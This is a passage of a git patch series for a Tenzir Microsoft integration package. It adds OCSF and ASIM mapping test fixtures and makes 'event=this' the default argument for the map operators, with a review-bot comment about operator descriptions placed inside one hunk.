+ EventEndTime: 2024-03-23T12:34:56Z,
+ EventProduct: "Windows",
+ EventVendor: "Microsoft",
+ EventOriginalType: "300201",
+ EventSeverity: "Informational",
+ EventResult: "Success",
+ Dvc: "WINHOST01",
+ DvcHostname: "WINHOST01",
+ DvcFQDN: "WINHOST01",
+ EventSchema: "Authentication",
+ EventSchemaVersion: "0.1.4",
+ EventType: "Logon",
+ ActorUsername: null,
+ ActorUserId: null,
+ ActorUserIdType: null,
+ ActorSessionId: null,
+ TargetUsername: "alice",
+ TargetUserId: null,
+ TargetUserIdType: null,
+ TargetSessionId: null,
+ SrcIpAddr: null,
+ SrcHostname: null,
+ SrcPortNumber: null,
+ TargetHostname: "WINHOST01",
+ TargetAppId: null,
+ TargetAppName: null,
+ LogonProtocol: null,
+ },
+}
diff --git a/microsoft/tests/graph/ocsf/scope.tql b/microsoft/tests/graph/ocsf/scope.tql
new file mode 100644
index 0000000..ed9f3ac
--- /dev/null
+++ b/microsoft/tests/graph/ocsf/scope.tql
@@ -0,0 +1,38 @@
+from {
+ graph: "outer-graph",
+ ocsf: "outer-ocsf",
+ payload: {
+ id: "sign-in-scope",
+ tenantId: "tenant-1",
+ createdDateTime: 2024-03-23T12:34:56Z,
+ userId: "user-1",
+ userPrincipalName: "alice@example.com",
+ userDisplayName: "Alice Example",
+ appId: "app-1",
+ appDisplayName: "Example App",
+ resourceId: "resource-1",
+ resourceDisplayName: "Microsoft Graph",
+ ipAddress: 203.0.113.10,
+ location: {
+ city: "Berlin",
+ countryOrRegion: "DE",
+ },
+ deviceDetail: {
+ operatingSystem: "Windows 11",
+ deviceId: "device-1",
+ },
+ status: {
+ errorCode: 0,
+ failureReason: "Other.",
+ },
+ mfaDetail: {},
+ conditionalAccessStatus: "success",
+ isInteractive: true,
+ },
+}
+@name = "microsoft.graph.sign_in"
+microsoft::ocsf::map event=payload
+select graph,
+ ocsf,
+ payload_class_uid=payload.class_uid,
+ payload_uid=payload.metadata.original_event_uid
diff --git a/microsoft/tests/graph/ocsf/scope.txt b/microsoft/tests/graph/ocsf/scope.txt
new file mode 100644
index 0000000..5da5033
--- /dev/null
+++ b/microsoft/tests/graph/ocsf/scope.txt
@@ -0,0 +1,6 @@
+{
+ graph: "outer-graph",
+ ocsf: "outer-ocsf",
+ payload_class_uid: 3002,
+ payload_uid: "sign-in-scope",
+}
diff --git a/microsoft/tests/ocsf/scope-windows.tql b/microsoft/tests/ocsf/scope-windows.tql
new file mode 100644
index 0000000..febfd4a
--- /dev/null
+++ b/microsoft/tests/ocsf/scope-windows.tql
@@ -0,0 +1,11 @@
+from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" {
+ read_all
+}
+payload = data.parse_winlog()
+windows = "outer-windows"
+ocsf = "outer-ocsf"
+microsoft::windows::ocsf::map event=payload
+select windows,
+ ocsf,
+ payload_class_uid=payload.class_uid,
+ payload_event_code=payload.metadata.event_code
diff --git a/microsoft/tests/ocsf/scope-windows.txt b/microsoft/tests/ocsf/scope-windows.txt
new file mode 100644
index 0000000..d2981fb
--- /dev/null
+++ b/microsoft/tests/ocsf/scope-windows.txt
@@ -0,0 +1,6 @@
+{
+ windows: "outer-windows",
+ ocsf: "outer-ocsf",
+ payload_class_uid: 0,
+ payload_event_code: "9999",
+}
From 83054f92f7b85f9da30e31c86858d0e5c647b9c6 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin Date: Fri, 12 Jun 2026 18:59:30 +0200 Subject: [PATCH 27/27] Default Microsoft maps to this Let the Microsoft public map UDOs use selector defaults for their event field parameter. Call sites that map the current record no longer need to spell out event=this, while nested selectors such as payload and win remain explicit. Assisted-by: GPT-5 (Codex) --- microsoft/examples/graph-defender-alerts-to-ocsf.tql | 2 +- microsoft/examples/graph-defender-incidents-to-ocsf.tql | 2 +- microsoft/examples/graph-directory-audits-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-compliance-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-detected-apps-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-managed-devices-to-ocsf.tql | 2 +- microsoft/examples/graph-risk-detections-to-ocsf.tql | 2 +- microsoft/examples/graph-risky-users-to-ocsf.tql | 2 +- microsoft/examples/graph-sign-ins-to-asim.tql | 4 ++-- microsoft/examples/graph-sign-ins-to-ocsf.tql | 2 +- microsoft/examples/windows-event-log-to-asim.tql | 2 +- microsoft/operators/asim/map.tql | 1 + microsoft/operators/asim/ocsf/map.tql | 1 + microsoft/operators/graph/ocsf/map.tql | 1 + microsoft/operators/ocsf/map.tql | 1 + microsoft/operators/windows/ocsf/map.tql | 1 + microsoft/tests/asim/graph.tql | 4 ++-- microsoft/tests/asim/ocsf.tql | 2 +- microsoft/tests/asim/ocsf/account_change.tql | 2 +- microsoft/tests/asim/ocsf/authentication.tql | 2 +- microsoft/tests/asim/ocsf/detection_finding.tql | 2 +- microsoft/tests/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/tests/asim/ocsf/dns_activity.tql | 2 +- microsoft/tests/asim/ocsf/event_log_activity.tql | 2 +- microsoft/tests/asim/ocsf/file_system_activity.tql | 2 +- microsoft/tests/asim/ocsf/group_management.tql | 2 +- microsoft/tests/asim/ocsf/http_activity.tql | 2 +- microsoft/tests/asim/ocsf/map.tql | 2 +- microsoft/tests/asim/ocsf/network_activity.tql | 2 +- microsoft/tests/asim/ocsf/process_activity.tql | 2 +- microsoft/tests/asim/windows.tql | 2 +- 
.../graph/ocsf/compliance-policy-setting-state-summaries.tql | 2 +-
microsoft/tests/graph/ocsf/defender-alerts.tql | 2 +-
microsoft/tests/graph/ocsf/defender-incidents.tql | 2 +-
microsoft/tests/graph/ocsf/detected-apps.tql | 2 +-
microsoft/tests/graph/ocsf/directory-audits.tql | 2 +-
microsoft/tests/graph/ocsf/managed-devices.tql | 2 +-
microsoft/tests/graph/ocsf/risk-detections.tql | 2 +-
microsoft/tests/graph/ocsf/risky-users.tql | 2 +-
microsoft/tests/graph/ocsf/sign-ins.tql | 2 +-
40 files changed, 42 insertions(+), 37 deletions(-)
diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql
index 3b5189b..ae2bd8f 100644
--- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql
+++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql
@@ -8,6 +8,6 @@ microsoft::graph::defender::alerts \
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
index 126f5a6..862f44c 100644
--- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql
+++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql
@@ -9,7 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql
index d4880e2..cf3498e 100644
--- a/microsoft/examples/graph-directory-audits-to-ocsf.tql
+++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql
@@ -9,7 +9,7 @@ every 5m {
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
index b0475dc..de4b6b2 100644
--- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
index 7ff5f48..3277563 100644
--- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
index 01f0a72..4e0ef7f 100644
--- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
+++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql
@@ -7,6 +7,6 @@ microsoft::graph::intune::managed_devices \
 tenant_id="TENANT_ID",
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql
index c81613b..5b59ea1 100644
--- a/microsoft/examples/graph-risk-detections-to-ocsf.tql
+++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql
index 8396a6b..1c37ffd 100644
--- a/microsoft/examples/graph-risky-users-to-ocsf.tql
+++ b/microsoft/examples/graph-risky-users-to-ocsf.tql
@@ -8,7 +8,7 @@ every 5m {
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET")
 }
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 publish "ocsf"
diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql
index 58b48a4..d9183fc 100644
--- a/microsoft/examples/graph-sign-ins-to-asim.tql
+++ b/microsoft/examples/graph-sign-ins-to-asim.tql
@@ -9,7 +9,7 @@ microsoft::graph::sign_ins \
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
 @name = "microsoft.graph.sign_in"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
-microsoft::asim::map event=this
+microsoft::asim::map
diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql
index 396489c..7a1031a 100644
--- a/microsoft/examples/graph-sign-ins-to-ocsf.tql
+++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql
@@ -8,6 +8,6 @@ microsoft::graph::sign_ins \
 client_id="CLIENT_ID",
 client_secret=secret("CLIENT_SECRET"),
 lookback=5m
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql
index 92a7fe2..a76a0e9 100644
--- a/microsoft/examples/windows-event-log-to-asim.tql
+++ b/microsoft/examples/windows-event-log-to-asim.tql
@@ -13,4 +13,4 @@ win.raw_data_size = win.raw_data.length_bytes()
 this = win
 ocsf::derive
 ocsf::cast
-microsoft::asim::map event=this
+microsoft::asim::map
diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql
index 526533d..446d785 100644
--- a/microsoft/operators/asim/map.tql
+++ b/microsoft/operators/asim/map.tql
@@ -5,6 +5,7 @@ args:
 - name: event
 description: The field that holds the OCSF event to map.
 type: field
+ default: this
 ---
 
 // If `ocsf::derive` and `ocsf::cast` gain `event=` support, this wrapper can
diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql
index 2fda544..f0db161 100644
--- a/microsoft/operators/asim/ocsf/map.tql
+++ b/microsoft/operators/asim/ocsf/map.tql
@@ -5,6 +5,7 @@ args:
 - name: event
 description: The field that holds the OCSF event to map.
 type: field
+ default: this
 ---
 
 match $event.class_uid {
diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql
index 1d78335..2e2b77a 100644
--- a/microsoft/operators/graph/ocsf/map.tql
+++ b/microsoft/operators/graph/ocsf/map.tql
@@ -5,6 +5,7 @@ args:
 - name: event
 description: The field that holds the Microsoft Graph event to map.
 type: field
+ default: this
 ---
 
 $event = {...$event, graph: $event, ocsf: {}}
diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql
index bf71cc6..f876504 100644
--- a/microsoft/operators/ocsf/map.tql
+++ b/microsoft/operators/ocsf/map.tql
@@ -5,6 +5,7 @@ args:
 - name: event
 description: The field that holds the Microsoft event to map.
 type: field
+ default: this
 ---
 
 if $event.System? != null {
diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql
index 7261389..a4f9099 100644
--- a/microsoft/operators/windows/ocsf/map.tql
+++ b/microsoft/operators/windows/ocsf/map.tql
@@ -5,6 +5,7 @@ args:
 - name: event
 description: The field that holds the structured Windows event to map.
 type: field
+ default: this
 ---
 
 $event = {...$event, windows: $event, ocsf: {}}
diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql
index a23870f..51ec30d 100644
--- a/microsoft/tests/asim/graph.tql
+++ b/microsoft/tests/asim/graph.tql
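Review bot: The `event` argument's `description` in this hunk still reads as if the field were mandatory now that `default: this` is added; the same applies to the asim/ocsf, graph/ocsf, ocsf and windows/ocsf `map.tql` hunks that follow. Suggest appending to each description a sentence such as `Defaults to the whole record; pass a selector such as event=payload to map a nested field.` so the generated operator reference reflects the behaviour the commit message describes.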
@@ -2,9 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
 read_json
 }
 @name = "microsoft.graph.sign_in"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
-microsoft::asim::map event=this
+microsoft::asim::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql
index 1b8dd42..11e19d8 100644
--- a/microsoft/tests/asim/ocsf.tql
+++ b/microsoft/tests/asim/ocsf.tql
@@ -30,5 +30,5 @@ from {
 ip: 10.0.0.1,
 },
 }
-microsoft::asim::map event=this
+microsoft::asim::map
 name = @name
diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql
index a99e0f5..3086449 100644
--- a/microsoft/tests/asim/ocsf/account_change.tql
+++ b/microsoft/tests/asim/ocsf/account_change.tql
@@ -36,5 +36,5 @@ from {
 },
 }
 @name = "ocsf.account_change"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql
index d0ed7ed..056ddfc 100644
--- a/microsoft/tests/asim/ocsf/authentication.tql
+++ b/microsoft/tests/asim/ocsf/authentication.tql
@@ -143,6 +143,6 @@ from {
 },
 }
 @name = "ocsf.authentication"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql
index 1b243e5..a63ba80 100644
--- a/microsoft/tests/asim/ocsf/detection_finding.tql
+++ b/microsoft/tests/asim/ocsf/detection_finding.tql
@@ -51,5 +51,5 @@ from {
 ],
 }
 @name = "ocsf.detection_finding"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql
index afaba70..473bb11 100644
--- a/microsoft/tests/asim/ocsf/dhcp_activity.tql
+++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql
@@ -25,6 +25,6 @@ from {
 mac: "00:11:22:33:44:55",
 },
 }
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql
index f601bc8..34952ae 100644
--- a/microsoft/tests/asim/ocsf/dns_activity.tql
+++ b/microsoft/tests/asim/ocsf/dns_activity.tql
@@ -29,6 +29,6 @@ from {
 ip: 10.0.0.1,
 },
 }
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql
index 9a65f42..af795f7 100644
--- a/microsoft/tests/asim/ocsf/event_log_activity.tql
+++ b/microsoft/tests/asim/ocsf/event_log_activity.tql
@@ -39,5 +39,5 @@ from {
 },
 }
 @name = "ocsf.event_log_activity"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql
index ef53ca8..ee39f7c 100644
--- a/microsoft/tests/asim/ocsf/file_system_activity.tql
+++ b/microsoft/tests/asim/ocsf/file_system_activity.tql
@@ -63,6 +63,6 @@ from {
 name: "invoice.pdf.exe",
 },
 }
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql
index b9df034..c7a004c 100644
--- a/microsoft/tests/asim/ocsf/group_management.tql
+++ b/microsoft/tests/asim/ocsf/group_management.tql
@@ -40,5 +40,5 @@ from {
 },
 }
 @name = "ocsf.group_management"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql
index 93c2bac..d4af115 100644
--- a/microsoft/tests/asim/ocsf/http_activity.tql
+++ b/microsoft/tests/asim/ocsf/http_activity.tql
@@ -29,6 +29,6 @@ from {
 code: 200,
 },
 }
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql
index e6278b8..ba2cfc6 100644
--- a/microsoft/tests/asim/ocsf/map.tql
+++ b/microsoft/tests/asim/ocsf/map.tql
@@ -21,4 +21,4 @@ from {
 },
 }
 @name = "ocsf.script_activity"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql
index 455919e..88fdce6 100644
--- a/microsoft/tests/asim/ocsf/network_activity.tql
+++ b/microsoft/tests/asim/ocsf/network_activity.tql
@@ -32,6 +32,6 @@ from {
 bytes_in: 200,
 },
 }
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
 sort EventOriginalUid
diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql
index c99aad2..0758530 100644
--- a/microsoft/tests/asim/ocsf/process_activity.tql
+++ b/microsoft/tests/asim/ocsf/process_activity.tql
@@ -55,5 +55,5 @@ from {
 },
 }
 @name = "ocsf.process_activity"
-microsoft::asim::ocsf::map event=this
+microsoft::asim::ocsf::map
 name = @name
diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql
index db04bbc..e3b182d 100644
--- a/microsoft/tests/asim/windows.tql
+++ b/microsoft/tests/asim/windows.tql
@@ -8,5 +8,5 @@ win.raw_data_size = win.raw_data.length_bytes()
 this = win
 ocsf::derive
 ocsf::cast
-microsoft::asim::map event=this
+microsoft::asim::map
 name = @name
diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
index 5d4e209..eda2e63 100644
--- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
+++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index cf784ee..b597953 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index e0c015e..d6ff2e3 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index 1637d4e..ef02388 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 95f4e46..973eafc 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql 
@@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" {
 read_json
 }
 @name = "microsoft.graph.directory_audit"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
 sort time
diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql
index 02f9820..1524afe 100644
--- a/microsoft/tests/graph/ocsf/managed-devices.tql
+++ b/microsoft/tests/graph/ocsf/managed-devices.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" {
 read_json
 }
 @name = "microsoft.graph.intune.managed_device"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql
index 444acb3..5fc5d4e 100644
--- a/microsoft/tests/graph/ocsf/risk-detections.tql
+++ b/microsoft/tests/graph/ocsf/risk-detections.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" {
 read_json
 }
 @name = "microsoft.graph.identity_protection.risk_detection"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql
index c7ea153..8d9ac02 100644
--- a/microsoft/tests/graph/ocsf/risky-users.tql
+++ b/microsoft/tests/graph/ocsf/risky-users.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" {
 read_json
 }
 @name = "microsoft.graph.identity_protection.risky_user"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql
index 65d3fb8..2c86d79 100644
--- a/microsoft/tests/graph/ocsf/sign-ins.tql
+++ b/microsoft/tests/graph/ocsf/sign-ins.tql
@@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
 read_json
 }
 @name = "microsoft.graph.sign_in"
-microsoft::ocsf::map event=this
+microsoft::ocsf::map
 ocsf::derive
 ocsf::cast